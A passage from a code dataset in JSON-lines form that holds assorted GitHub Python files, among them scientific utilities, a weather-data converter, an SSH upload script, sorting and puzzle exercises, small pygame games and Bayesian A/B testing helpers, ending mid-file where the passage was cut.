mem.append(torch.cuda.max_memory_allocated() / 1e6)\n mem = torch.tensor(mem)\n delta = (mem[1:] - mem[:-1]) / (test_batch_sizes[1:] - test_batch_sizes[:-1])\n delta = delta[1:] # first try may be off due to caching\n assert (delta > 0).all()\n memory_per_batch = delta.mean() / mem_margin\n if delta.std() / memory_per_batch > 0.3:\n raise DeepQMCError(\n 'Inconsistent estimation of GPU memory per batch. '\n 'Try specifying large test_batch_sizes.'\n )\n max_memory = max_memory or unused_cuda_memory()\n return int(max_memory / memory_per_batch)\n\n\nclass H5LogTable:\n def __init__(self, group):\n self._group = group\n\n def __getitem__(self, label):\n return self._group[label] if label in self._group else []\n\n def resize(self, size):\n for ds in self._group.values():\n ds.resize(size, axis=0)\n\n # mimicking Pytables API\n @property\n def row(self):\n class Appender:\n def __setitem__(_, label, row): # noqa: B902, N805\n if isinstance(row, np.ndarray):\n shape = row.shape\n elif isinstance(row, (float, int)):\n shape = ()\n if label not in self._group:\n if isinstance(row, np.ndarray):\n dtype = row.dtype\n elif isinstance(row, float):\n dtype = float\n else:\n dtype = None\n self._group.create_dataset(\n label, (0, *shape), maxshape=(None, *shape), dtype=dtype,\n )\n ds = self._group[label]\n ds.resize(ds.shape[0] + 1, axis=0)\n ds[-1, ...] = row\n\n return Appender()\n\n\nclass DebugLogTable:\n def __init__(self):\n self._data = defaultdict(list)\n\n def __getitem__(self, label):\n return self._data[label]\n\n @property\n def row(self):\n class Appender:\n def __setitem__(_, label, row): # noqa: B902, N805\n self._data[label].append(row)\n\n return Appender()\n\n\nclass _EnergyOffset:\n value = None\n\n def __call__(self, offset):\n assert self.value is None\n self.value = offset\n return self\n\n def __enter__(self):\n return self\n\n def __exit__(self, *args):\n assert self.value is not None\n self.value = None\n return None\n\n def __rsub__(self, base):\n return base - self.value if self.value else base\n\n\nenergy_offset = _EnergyOffset()\n","repo_name":"currymj/deepqmc","sub_path":"src/deepqmc/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"43494276443","text":"\"\"\"Configuration for `nox`, which runs tests in a virtualized environment.\"\"\"\n\nimport nox\nfrom nox import Session\nfrom nox_poetry import session as nox_session\nfrom sys import version_info\n\n# default nox sessions (overridden with -s)\nnox.options.sessions = (\"lint\", \"test\")\n\nPYTHON_VERSIONS = f\"{version_info.major}.{version_info.minor}\"\nSRC_LOCATIONS = [\"src\", \"tests\"]\n\nTEST_DEPS = (\"pytest\", \"pytest-cov\", \"pytest-lazy-fixture\", \"pytest-mock\")\nLINTERS = (\n \"flake8\",\n \"flake8-black\",\n \"flake8-bugbear\",\n \"pydocstyle\",\n \"mypy\",\n \"pylint\",\n)\n\n\n@nox_session(python=PYTHON_VERSIONS)\ndef test(session: Session) -> None:\n \"\"\"Run pytest in the specified python environment.\"\"\"\n args = session.posargs or [\"--cov\"]\n session.install(\".\")\n session.install(*TEST_DEPS)\n session.run(\"pytest\", *args)\n\n\n@nox.session(python=\"3.10\")\ndef coverage(session: Session) -> None:\n \"\"\"Upload coverage data.\"\"\"\n session.install(\".\")\n session.install(\"coverage[toml]\", \"codecov\")\n session.install(*TEST_DEPS)\n session.run(\"coverage\", \"xml\", \"--fail-under=0\")\n session.run(\"codecov\", *session.posargs)\n\n\n@nox_session(python=PYTHON_VERSIONS)\ndef test_slow(session: Session) -> None:\n \"\"\"Run the slow python tests.\"\"\"\n args = session.posargs or [\"-m slow\"]\n session.install(\".\")\n session.install(*TEST_DEPS)\n session.run(\"pytest\", *args)\n\n\n@nox_session(python=PYTHON_VERSIONS)\ndef lint(session: Session) -> None:\n \"\"\"Run static linters in the specified python environment.\"\"\"\n args = session.posargs or SRC_LOCATIONS\n session.install(\".\")\n session.install(*TEST_DEPS) # installed so they type check\n session.install(*LINTERS)\n session.run(\"flake8\", *args)\n session.run(\"pydocstyle\", *args)\n session.run(\"pylint\", *args)\n session.run(\"mypy\", *args)\n\n\n@nox_session(python=\"3.10\")\ndef fmt(session: Session) -> None:\n \"\"\"Format the codebase with black.\"\"\"\n args = session.posargs or SRC_LOCATIONS\n session.install(\"black\", \"isort\")\n session.run(\"black\", *args)\n session.run(\"isort\", *args)\n","repo_name":"nihilistkitten/aga","sub_path":"noxfile.py","file_name":"noxfile.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"71462216007","text":"import numpy as np\nimport pandas as pd\nimport os\nimport sys\nimport netCDF4\nfrom datetime import datetime\nimport argparse\nimport tarfile\nimport glob\n\ndef get_gsod_dataframe(fname, year):\n\n col_names = ['STN---', 'WBAN', 'YEARMODA', 'TEMP', 'nTEMP', 'DEWP', 'nDEWP', 'SLP', 'nSLP', 'STP', 'nSTP', 'VISIB', 'nVISIB', 'WDSP', 'nWDSP', 'MXSPD', 'GUST', 'MAX', 'MIN', 'PRCP', 'SNDP', 'FRSHTT']\n df = pd.read_csv(fname, compression='gzip', header=None, names=col_names, skiprows=1, index_col=2, dtype=object, sep=r'\\s{1,}', parse_dates=[2])\n df = df.reindex(pd.date_range('01-01-{}'.format(year), '31-12-{}'.format(year)), fill_value=np.NaN)\n #df.index.names = ['time']\n df = df.drop(['STN---', 'WBAN'], axis=1)\n df['TEMP'] = df['TEMP'].replace('9999.9',np.NaN)\n df['TEMP'] = df['TEMP'].astype(np.float32)\n df['nTEMP'] = df['nTEMP'].replace(np.nan, 255).astype(np.uint8)\n df['DEWP'] = df['DEWP'].replace('9999.9',np.NaN)\n df['DEWP'] = df['DEWP'].astype(np.float32)\n df['nDEWP'] = df['nDEWP'].replace(np.nan, 255).astype(np.uint8)\n df['SLP'] = df['SLP'].replace('9999.9',np.NaN)\n df['SLP'] = df['SLP'].astype(np.float32)\n df['nSLP'] = df['nSLP'].replace(np.nan, 255).astype(np.uint8)\n df['STP'] = df['STP'].replace('9999.9',np.NaN)\n df['STP'] = df['STP'].astype(np.float32)\n df['nSTP'] = df['nSTP'].replace(np.nan, 255).astype(np.uint8)\n df['VISIB'] = df['VISIB'].replace('9999.9', np.NaN).replace('999.9',np.NaN)\n df['VISIB'] = df['VISIB'].astype(np.float32)\n df['nVISIB'] = df['nVISIB'].replace(np.nan, 255).astype(np.uint8)\n df['WDSP'] = df['WDSP'].replace('999.9',np.NaN)\n df['WDSP'] = df['WDSP'].astype(np.float32)\n df['nWDSP'] = df['nWDSP'].replace(np.nan, 255).astype(np.uint8)\n df['MXSPD'] = df['MXSPD'].replace('999.9', np.NaN)\n df['MXSPD'] = df['MXSPD'].astype(np.float32)\n df['GUST'] = df['GUST'].replace('999.9', np.NaN)\n df['GUST'] = df['GUST'].astype(np.float32)\n df['MAX'] = df['MAX'].replace('9999.9', np.NaN)\n df['MAX'] = df['MAX'].map(lambda x: str(x).rstrip('*'))\n df['MAX'] = df['MAX'].astype(np.float32)\n df['MIN'] = df['MIN'].replace('9999.9', np.NaN)\n df['MIN'] = df['MIN'].map(lambda x: str(x).rstrip('*'))\n df['MIN'] = df['MIN'].astype(np.float32)\n df['PRCP'] = df['PRCP'].replace('99.99', np.NaN)\n df['tPRCP'] = df['PRCP'].map(lambda x: ord(str(x)[-1])-65)\n df['tPRCP'] = df['tPRCP'].astype(np.uint8)\n df['PRCP'] = df['PRCP'].map(lambda x: str(x)[:-1] if str(x) != \"nan\" else x)\n df['PRCP'] = df['PRCP'].astype(np.float32)\n df['SNDP'] = df['SNDP'].replace('999.9',np.NaN)\n df['SNDP'] = df['SNDP'].astype(np.float32)\n\n return df\n\ndef write_netcdf(nc_filename, dfs):\n with netCDF4.Dataset(nc_filename, 'w', format='NETCDF4') as dest:\n times = dfs[10010].index.values.tolist()\n t_dim = dest.createDimension(\"time\", len(times))\n station_dim = dest.createDimension(\"station\", len(list(dfs.keys())))\n\n var = dest.createVariable(\"time\", \"f8\", (\"time\",))\n var.units = \"seconds since 1970-01-01 00:00:00.0\"\n var.calendar = \"standard\"\n var.long_name = \"Time, unix time-stamp\"\n var.standard_name = \"time\"\n var[:] = netCDF4.date2num([datetime.fromtimestamp(t // 1000000000) for t in times], units=\"seconds since 1970-01-01 00:00:00.0\", calendar=\"standard\")\n \n var = dest.createVariable(\"station\", \"i4\", (\"station\",))\n var.long_name = \"WMO Station ID\"\n var.standard_name = \"station\"\n var[:] = np.array(list(dfs.keys()))\n\n var = dest.createVariable(\"precip\", \"f4\", (\"time\", \"station\"), fill_value=np.nan)\n var.long_name = \"24h precipitation\"\n var.units = 'mm'\n arr = np.zeros((len(times), len(list(dfs.keys()))))\n \n i=0\n for key, df in dfs.items():\n # 0.01 inches to mm\n arr[:,i]=df['PRCP'].values\n i+=1\n \n var[:] = arr\n \n var = dest.createVariable(\"t_precip\", \"i\", (\"time\", \"station\"), fill_value=255)\n var.long_name = \"24h precipitation accumulation mode\"\n arr = np.zeros((len(times), len(list(dfs.keys()))))\n \n i=0\n for key, df in dfs.items():\n arr[:,i]=df['tPRCP'].values\n i+=1\n \n var[:] = arr\n \n \n var = dest.createVariable(\"mean_temp\", \"f4\", (\"time\", \"station\"), fill_value=np.nan)\n var.long_name = \"24h mean temperature\"\n var.units = 'F'\n arr = np.zeros((len(times), len(list(dfs.keys()))))\n \n i=0\n for key, df in dfs.items():\n # Fahrenheit to Kelvin\n arr[:,i]= (df['TEMP'].values + 459.67) * 5./9.\n i+=1\n \n var[:] = arr\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Usage: gsod.py should be called by the gsod.ksh script which checks for updated GSOD files\n downloads them and then this script outputs a netCDF4 version of these files.\n\n arguments:\n -in, --input_filename Specifies the path to the file containing the list of GSOD files\n to be updated, one per line. It's default value is \"updatedFiles\"\n which the gsod.ksh script writes.\n -out, --output_filename Specifies the path to the netCDF4 file with the year GSOD data\n written by this script.\n \"\"\"\n\n parser = argparse.ArgumentParser(description='Description of your program')\n parser.add_argument('-in', '--input_filename', help='GSOD input file name', default=\"updatedFiles\", type=str, required=False)\n parser.add_argument('-out', '--output_path', help='Path to the location where GSOD netcdf4 file are written', default=\"./\", type=str, required=False)\n args = vars(parser.parse_args())\n\n if not os.path.exists(args[\"input_filename\"]):\n print(\"The input file does not exists\")\n sys.exit(1)\n \n if not os.path.exists('tmp'):\n os.makedirs('tmp')\n \n with open(args[\"input_filename\"]) as f:\n fnames = f.readlines()\n for fname in fnames:\n fname = fname.rstrip('\\n')\n name, ext = os.path.splitext(fname)\n \n print(len(name.split(\"_\")) == 2, name.split(\"_\")[0] == \"gsod\", name.split(\"_\")[1].isdigit())\n if not (len(name.split(\"_\")) == 2 and name.split(\"_\")[0] == \"gsod\" and name.split(\"_\")[1].isdigit()):\n print(\"The file names specified in the input file don't have the expected format 'GSOD_YEAR.tar'\")\n sys.exit(1)\n\n year = int(name.split(\"_\")[1])\n\n tmp_files = glob.glob('tmp/*')\n for tmp_f in tmp_files:\n os.remove(tmp_f)\n\n print(fname)\n if not fname.endswith(\".tar\"):\n print(\"The files specified in the input file should have tar extension\")\n sys.exit(1)\n \n tar = tarfile.open(fname)\n tar.extractall(path='tmp')\n tar.close()\n print(\"Extracted in Current Directory\")\n\n dfs = {}\n\n for i, gzfname in enumerate(os.listdir(\"tmp/\")):\n if not gzfname.endswith(\".gz\") or gzfname[:6] == \"999999\":\n continue\n \n dfs[int(gzfname[:6])] = get_gsod_dataframe(os.path.join(\"tmp/\", gzfname), year)\n \n nc_name = name + \".nc\"\n write_netcdf(os.path.join(args[\"output_path\"], nc_name) , dfs)\n\n","repo_name":"ANU-WALD/pluvi_pondus","sub_path":"data_pipeline/gsod.py","file_name":"gsod.py","file_ext":"py","file_size_in_byte":7447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3375210252","text":"import paramiko\nimport os\nimport json\n\n#load conf file\nconf = json.load(open('conf_sendToAWS.json'))\nfile = os.open(conf[\"file\"], os.O_RDWR)\ndestination = conf[\"destination\"]\nusername = conf[\"username\"]\nadresse = conf[\"adresse\"]\npredictFile = conf[\"predictFile\"]\n\nclient = paramiko.SSHClient()\nclient.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nKey_file = paramiko.RSAKey.from_private_key_file(conf[\"pathFilePEM\"])\n\n#send data.csv to the AWS machine\nclient.connect(adresse, username=username, port=22, pkey=Key_file)\nsftp_client = client.open_sftp()\nsftp_client.put(file, destination)\n\n#execute script on the AWS machine \nclient.exec_command('python3.10 /home/ec2-user/scriptAWS.py')\n\n#get the prediction of the script\nsftp_client.get(\"/home/ec2-user/\"+predictFile,\"./\"+predictFile)\nsftp_client.close()\nclient.close()\n","repo_name":"AurelienArbaretaz/big_data","sub_path":"sendToAWS.py","file_name":"sendToAWS.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12973544611","text":"# O(nlogn) average time\n# O(nlogn) worst-case time\n# O(n) space\n# Stable\n\ndef sort(L):\n if len(L) < 2:\n return L\n mid = len(L) // 2\n left = sort(L[:mid])\n right = sort(L[mid:])\n res = []\n while left and right:\n if left[0] < right[0]:\n res.append(left.pop(0))\n else:\n res.append(right.pop(0))\n res += left + right\n return res\n","repo_name":"coxj1990/algos","sub_path":"src/sorting/mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9375860597","text":"from functools import reduce\n\n\ndef calculate_product(numbers):\n product = reduce(lambda x, y: x * y,\n [num for num in numbers if num % 2 == 0])\n return product\n\n\ndef calculate_squares(numbers):\n squares = [num**2 for num in numbers if num % 2 != 0]\n return squares\n\n\nnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nproduct = calculate_product(numbers)\nsquares = calculate_squares(numbers)\n\nprint(\"Product of even numbers:\", product)\nprint(\"Squares of odd numbers:\", squares)\n","repo_name":"MantsSk/CA_Python","sub_path":"uzduotys/uzduotis_5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"31259010600","text":"def collazt(num):\n result = True\n while(result):\n num = num // 2 if num % 2 == 0 else num * 3 + 1\n print(num)\n result = False if num == 1 else True\n\ntry:\n num = int(input(\"Enter the number:\"))\n collazt(num)\nexcept ValueError:\n print(\"Please enter an Integer\")\n\n","repo_name":"sophia050506/python_study","sub_path":"automate_the_boring_stuff_with_python/chapter03/collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36371183346","text":"import pygame as pg\nfrom const import *\nimport math\n#This file would be home of the GameObject class\n#So i made a cannon that shoot not rigid bodies\n\nclass Cannon:\n def __init__(self,max):\n self.position = [0,0]\n self.initPos = [0,0]\n\n self.max = max\n\n self.fonte = pg.font.Font('Assets/fonte.ttf',30)\n self.cannonBall_image = pg.image.load('Assets/Objects/box.png')\n self.shoot = False\n self.projectiles =[]\n\n self.pontuacao = 0\n\n self.line = []\n\n self.counter= 0\n\n self.angle = 0\n self.deltax=0\n self.deltay=0\n def update(self):\n\n #print(math.degrees(math.asin(0.5)))\n\n self.position = [pg.mouse.get_pos()[0],pg.mouse.get_pos()[1]]\n\n if(pg.mouse.get_pressed()[0] and self.shoot==False and self.projectiles.__len__()300):\n self.pontuacao+=self.projectiles.__len__()\n self.counter=0\n\n\n def draw(self,display):\n display.blit(Text('Points: '+str(self.pontuacao),self.fonte,RED),(500,30))\n for projectile in self.projectiles:\n projectile.draw(display,self.cannonBall_image)\n if(self.shoot):\n pg.draw.lines(display, RED, False,self.line,2)\n display.blit(Text('angle: '+str(self.angle),self.fonte,RED),(30,30))\n display.blit(Text('DeltaX: '+str(self.deltaX),self.fonte,RED),(30,60))\n display.blit(Text('DeltaY: '+str(self.deltaY),self.fonte,RED),(30,90))\n\n\nclass Projectile:\n def __init__(self,position,angle,strenght,w,h):\n self.position = position\n self.w=w\n self.h=h\n self.vy = math.sin(angle)*strenght*1.8\n self.vx=math.cos(angle)*strenght*1.5\n self.destroy = False\n self.gravity = 0.3\n self.ponto = False\n #should be around 0.15 if realistic\n def update(self):\n self.ponto = False\n self.vy+=self.gravity\n self.position[0]+=self.vx\n self.position[1]+=self.vy\n if(self.position[1]>700):\n self.destroy = True\n if(self.position[0]>=740 or self.position[0]<=0):\n self.vx=-self.vx/2\n if(self.hitTest(pg.Rect(self.position[0],self.position[1],60,60),\n pg.Rect(pg.mouse.get_pos()[0],pg.mouse.get_pos()[1],2,2))and self.vy>0):\n self.vy-=15\n self.vx+=(self.position[0]+30-pg.mouse.get_pos()[0])/10\n self.position[1]-=10\n self.ponto=True\n\n\n def draw(self,display,image):\n display.blit(image,self.position)\n\n def hitTest(self,rect1,rect2):\n return rect1.colliderect(rect2)","repo_name":"PauloGasparSv/SmallPhysics","sub_path":"gameObject.py","file_name":"gameObject.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9541029196","text":"from models.build import build_bct,build_adversarial_bct,build_tencent_bct,build_vanilla_model,build_bct_transformation\nfrom models.margin_softmax import large_margin_module\nfrom models.loss import BackwardCompatibleLoss,UpgradeLoss,UpgradeCenterLoss,UpgradeCenterPartialLoss\nfactory_model={\n \"base_model\":build_vanilla_model,\n \"bct\":build_bct,\n \"adv_bct\":build_adversarial_bct\n}\n\ndef build_bct_models(name,configs=None,debug=False):\n '''\n\n :param name:\n :param args:\n :return: model if not bct else new model and old model.\n for adv_bct, return new model, old model and discriminator\n '''\n if name == 'base_model':\n if debug:\n args = {\n 'task': 'landmark',\n \"arch\": 'resnet18',\n \"pretrained\": False,\n \"pretrained_path\": None,\n \"num_class\": 100000,\n \"use_cls\": True,\n \"out_dim\": 256}\n return factory_model[name](**args)\n args = {\n 'task': configs.TRAIN.DATASET_TYPE,\n \"arch\": configs.MODEL.ARCH,\n \"pretrained\": configs.MODEL.PRETRAINED,\n \"pretrained_path\": configs.MODEL.PRETRAINED_PATH,\n \"num_class\": configs.MODEL.NUM_CLASSES,\n \"use_cls\": configs.MODEL.USE_CLS,\n \"out_dim\": configs.MODEL.EMB_DIM}\n\n else:\n args = {\n 'task': configs.TRAIN.DATASET_TYPE,\n \"arch_old\":configs.OLD_MODEL.ARCH,\n \"pretrained_old\":configs.OLD_MODEL.PRETRAINED,\n \"pretrained_path_old\":configs.OLD_MODEL.PRETRAINED_PATH,\n \"num_class_old\":configs.OLD_MODEL.NUM_CLASSES,\n \"use_cls_old\":configs.OLD_MODEL.USE_CLS,\n\n \"out_dim\":configs.MODEL.EMB_DIM,\n\n \"arch_new\":configs.NEW_MODEL.ARCH,\n \"pretrained_new\": configs.NEW_MODEL.PRETRAINED,\n \"pretrained_path_new\": configs.NEW_MODEL.PRETRAINED_PATH,\n \"num_class_new\":configs.NEW_MODEL.NUM_CLASSES,\n \"use_cls_new\": configs.NEW_MODEL.USE_CLS,\n \"eboundary\": configs.COMP_LOSS.ELASTIC_BOUNDARY\n }\n return factory_model[name](**args)\n","repo_name":"Ashespt/AdvBCT","sub_path":"models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"73446180807","text":"import pygame\nfrom random import randint\n\n\nclass Ball:\n def __init__(self, board, restart_key=pygame.K_SPACE, auto_play_key=pygame.K_c, pause_key=pygame.K_p):\n self.rect = pygame.Rect(20, randint(20, board.size[1] - 20), 20, 20)\n self.color = (0, 128, 255)\n self.colorAutoPlay = (255, 0, 0)\n self.speed = [0, 0]\n self.board = board\n self.restartKey = restart_key\n self.autoPlayKey = auto_play_key\n self.pauseKey = pause_key\n self.autoPlay = False\n self.isPaused = False\n self.pausedSpeed = self.speed\n\n def initialize(self):\n self.start_position()\n self.color = (0, 128, 255)\n self.speed = [1, 1]\n\n def start_position(self):\n self.rect = pygame.Rect(20, randint(20, self.board.size[1] - 20), 20, 20)\n self.speed = [0, 0]\n if self.autoPlay:\n self.color = (0, 128, 255)\n self.speed = [1, 1]\n\n def paddle_missed(self):\n self.speed[0] = -self.speed[0]\n\n def update(self):\n self.rect = self.rect.move(self.speed)\n if self.rect.top < 0 or self.rect.bottom > self.board.size[1]:\n self.speed[1] = -self.speed[1]\n\n if self.autoPlay and (self.rect.left < 0 or self.rect.right > self.board.size[0]):\n self.speed[0] = -self.speed[0]\n\n def render(self):\n self.update()\n screen = self.board.screen\n pygame.draw.circle(screen, self.ball_color(),\n (int(self.rect.centerx), int(self.rect.centery)),\n int(self.rect.width / 2), 0)\n\n def did_hit(self, paddle):\n if self.rect.colliderect(paddle.rect):\n self.speed[0] = -self.speed[0]\n return 1\n return 0\n\n def did_pause(self):\n if self.isPaused:\n self.speed = self.pausedSpeed\n else:\n self.pausedSpeed = self.speed\n self.speed = [0, 0]\n self.isPaused = not self.isPaused\n\n def event_check(self, event):\n if event.type == pygame.KEYDOWN and event.key == self.pauseKey:\n self.did_pause()\n if event.type == pygame.KEYDOWN and event.key == self.restartKey:\n self.initialize()\n if event.type == pygame.KEYDOWN and event.key == self.autoPlayKey:\n self.autoPlay = not self.autoPlay\n\n def ball_color(self):\n return self.colorAutoPlay if self.autoPlay else self.color\n","repo_name":"asaladino/pong-p","sub_path":"src/models/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"14824175843","text":"def opcode_1(array, modes, index):\n params = get_params(array, modes, index)\n array[(array[index + 3])] = params[1] + params[0]\n\n\ndef opcode_2(array, modes, index):\n params = get_params(array, modes, index)\n array[(array[index + 3])] = params[1] * params[0]\n\n\ndef opcode_3(array, index, input_val):\n address = array[index + 1]\n array[address] = input_val\n\n\ndef opcode_4(array, index):\n address = int(array[index + 1])\n return int(array[address])\n\n\ndef opcode_5(array, modes, index):\n params = get_params(array, modes, index)\n if params[0] != 0:\n return params[1]\n else:\n return index\n\n\ndef opcode_6(array, modes, index):\n params = get_params(array, modes, index)\n if params[0] == 0:\n return params[1]\n else:\n return index\n\n\ndef opcode_7(array, modes, index):\n params = get_params(array, modes, index)\n if params[0] < params[1]:\n array[array[index + 3]] = 1\n else:\n array[array[index + 3]] = 0\n\n\ndef opcode_8(array, modes, index):\n params = get_params(array, modes, index)\n if params[0] == params[1]:\n array[array[index + 3]] = 1\n else:\n array[array[index + 3]] = 0\n\n\ndef opcode_99():\n pass\n # print('Code has completed. output is: ', output)\n\n\ndef did_change(array, index, opcode):\n if ('0000' + str(array[index])) == opcode:\n return False\n else:\n return True\n\n\ndef get_params(array, modes, index):\n params = []\n modes = modes[::-1]\n for i in range(len(modes)):\n v = int(array[index + i + 1])\n if modes[i] == '0':\n params.append(array[v])\n elif modes[i] == '1':\n params.append(v)\n return params\n\n\nclass OpcodeComp:\n def __init__(self, array):\n self.memory = list(array)\n self.input = 0\n self.phase = 0\n self.output = 0\n self.index = 0\n self.finished = False\n self.isPhase = True\n\n def set_phase(self, val: int):\n self.phase = val\n\n def set_input(self, val: int):\n self.input = val\n\n def read_input(self):\n if self.isPhase:\n self.isPhase = False\n return self.phase\n else:\n return self.input\n\n def has_finished(self):\n return self.finished\n\n def set_output(self, val: int):\n self.output = val\n\n def get_output(self):\n return self.output\n\n def run_opcode(self):\n while not self.finished:\n # init fn, get method code from opcode str\n opcode = str(self.memory[self.index])\n opcode = '0000' + opcode\n fn = opcode[-2:]\n\n if fn == '01':\n opcode_1(self.memory, opcode[-5:-2], self.index)\n count = 4\n elif fn == '02':\n opcode_2(self.memory, opcode[-5:-2], self.index)\n count = 4\n elif fn == '03':\n input_val = self.read_input()\n opcode_3(self.memory, self.index, input_val)\n count = 2\n elif fn == '04':\n self.output = opcode_4(self.memory, self.index)\n # print('Output: ',self.output)\n self.index += 2\n break\n elif fn == '05':\n self.index = opcode_5(self.memory, opcode[-4:-2], self.index)\n count = 3\n elif fn == '06':\n self.index = opcode_6(self.memory, opcode[-4:-2], self.index)\n count = 3\n elif fn == '07':\n opcode_7(self.memory, opcode[-5:-2], self.index)\n count = 4\n elif fn == '08':\n opcode_8(self.memory, opcode[-5:-2], self.index)\n count = 4\n elif fn == '99':\n opcode_99()\n self.finished = True\n break\n else:\n print('Error')\n break\n\n # increment in case where instruction pointer has not changed\n if did_change(self.memory, self.index, opcode):\n continue\n else:\n self.index += count\n continue\n return 'Error'\n","repo_name":"E-Aho/AdventOfCode2019","sub_path":"07/Methods.py","file_name":"Methods.py","file_ext":"py","file_size_in_byte":4166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34886155485","text":"import json\nimport logging\nimport logging.config as log_conf\nimport os\nimport subprocess\nimport sys\n\nimport argparse\nimport textwrap\n\nimport setup_property\n\n\nclass RunnerError(Exception):\n def __init__(self, value):\n self._value = value\n\n def __str__(self):\n return repr(self._value)\n\n\ndef main(arguments):\n spark_submit = \"{0}/bin/spark-submit\".format(arguments.spark_path)\n monanas_path = os.environ.get('MONANAS_HOME', \"\")\n kafka_jar = None\n\n try:\n for filename in os.listdir(\"{0}/external/kafka-assembly/target\".\n format(arguments.spark_path)):\n if filename.startswith(\"spark-streaming-kafka-assembly\") and\\\n not any(s in filename for s in [\"source\", \"test\"]):\n kafka_jar = filename\n break\n\n if not kafka_jar:\n raise OSError(\"Spark's external library required does not exist.\")\n except OSError as e:\n raise RunnerError(e.__str__())\n\n spark_kafka_jar = \"{0}/external/kafka-assembly/target/{1}\".\\\n format(arguments.spark_path, kafka_jar)\n command = [\n spark_submit, \"--master\", \"local[2]\",\n \"--jars\", spark_kafka_jar, monanas_path + \"/monasca_analytics/monanas.py\",\n arguments.config, arguments.log_config\n ]\n\n if arguments.sources is not None:\n command += arguments.sources\n\n try:\n logger.info(\"Executing `{}`...\".format(\" \".join(command)))\n subprocess.Popen(command).communicate()\n except OSError as e:\n raise RunnerError(e.__str__())\n\n\ndef setup_logging(filename):\n \"\"\"Setup logging based on a json string.\"\"\"\n with open(filename, \"rt\") as f:\n config = json.load(f)\n\n log_conf.dictConfig(config)\n\ndef setup_parser():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=textwrap.dedent(__doc__.strip()),\n add_help=False)\n\n parser.add_argument('-c', '--config',\n help='Config file.', required=True)\n # \"-d\" currently unused\n parser.add_argument('-d', '--debug',\n help='Show debug messages.', action='store_true')\n parser.add_argument('-h', '--help',\n help='Show this screen.', action='help')\n parser.add_argument('-l', '--log_config',\n help='Log config file\\'s path.', required=True)\n parser.add_argument('-p', '--spark_path',\n help='Spark\\'s path.', required=True)\n parser.add_argument('-s', '--sources',\n help='A list of data sources.', nargs='*')\n parser.add_argument('-v', '--version',\n help='Show version.', action='version',\n version=setup_property.VERSION)\n\n return parser\n\nif __name__ == \"__main__\":\n arguments = setup_parser().parse_args()\n\n try:\n setup_logging(arguments.log_config)\n except IOError:\n raise RunnerError(\"File not found: {0}.\".\n format(arguments.log_config))\n except ValueError:\n raise RunnerError(\"{0} is not a valid logging config file.\".\n format(arguments.log_config))\n\n logger = logging.getLogger(__name__)\n\n try:\n main(arguments)\n except KeyboardInterrupt:\n logger.info(\"Monanas run script stopped.\")\n except RunnerError as e:\n logger.error(e.__str__())\n except Exception as e:\n logger.error(\"Unexpected error: {0}. {1}.\".\n format(sys.exc_info()[0], e))\n","repo_name":"daisuke-fujita/monsaca-analytics_20190912","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"7146913051","text":"import numpy as np\nimport pandas as pd\nfrom scipy.stats import beta, norm\nimport matplotlib.pyplot as plt\n\n\ndef update_beta_prior(trials: int, success: int, alpha0: float, beta0: float) -> tuple[float, float]:\n \"\"\"\n Updates the prior beta distribution parameters, alpha and beta, based on the number of trials and successes.\n\n Args:\n trials (int): The number of trials.\n success (int): The number of successes.\n alpha0 (float): The prior alpha parameter.\n beta0 (float): The prior beta parameter.\n\n Returns:\n A tuple containing the updated alpha and beta parameters, alpha1 and beta1 respectively.\n \"\"\"\n alpha1 = alpha0 + success\n beta1 = beta0 + trials - success\n return alpha1, beta1\n\n\ndef dbeta_B_minus_A(alpha_a: float, beta_a: float, alpha_b: float, beta_b: float) -> norm:\n \"\"\"\n Calculates the difference between two beta distributions, B and A, and returns a normal distribution.\n\n Args:\n alpha_a (float): The alpha parameter of distribution A.\n beta_a (float): The beta parameter of distribution A.\n alpha_b (float): The alpha parameter of distribution B.\n beta_b (float): The beta parameter of distribution B.\n\n Returns:\n A normal distribution representing the difference between distributions B and A.\n \"\"\"\n beta_mean_a = beta.mean(alpha_a, beta_a)\n beta_mean_b = beta.mean(alpha_b, beta_b)\n beta_var_a = beta.var(alpha_a, beta_a)\n beta_var_b = beta.var(alpha_b, beta_b)\n\n dbeta = norm(loc=beta_mean_b - beta_mean_a,\n scale=np.sqrt(beta_var_a + beta_var_b))\n return dbeta\n\n\ndef explain_prob_B_higher(df: pd.DataFrame, i: int) -> None:\n \"\"\"\n Plots the probability density function of the difference between two beta distributions and prints a summary of the\n results for a specific index in a pandas DataFrame.\n\n Args:\n df (pd.DataFrame): A pandas DataFrame containing the beta distribution parameters, p-values, and probability of\n B being higher for each variant.\n i (int): The index of the variant to 